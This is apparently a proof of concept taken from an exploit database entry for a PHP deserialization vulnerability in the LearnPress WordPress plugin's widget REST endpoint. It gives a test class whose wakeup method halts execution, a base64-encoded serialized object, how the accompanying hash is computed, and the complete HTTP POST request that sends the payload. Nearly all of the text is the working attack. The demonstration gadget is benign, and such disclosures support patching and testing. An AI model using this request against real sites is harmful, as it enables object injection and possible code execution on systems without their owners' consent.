## https://sploitus.com/exploit?id=WPEX-ID:ACEA7A54-A964-4127-A93F-F38F883074E3
To simulate a gadget chain, put the following code in a plugin
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
payload: {"widget":"learnpress_widget_course_extra","instance":"Tzo0OiJFdmlsIjowOnt9Ow==","hash":"ef7da9dd4fe6ebf4598ab3c7b975322f"}
- instance is base64 encode of serialized object: O:4:"Evil":0:{};
- hash is caculated by: wp_hash(base64_decode($instance ))
POST /wp-json/lp/v1/widgets/api?_locale=user HTTP/1.1
Content-Type: application/json
Content-Length: 123
{"widget":"learnpress_widget_course_extra","instance":"Tzo0OiJFdmlsIjowOnt9Ow==","hash":"ef7da9dd4fe6ebf4598ab3c7b975322f"}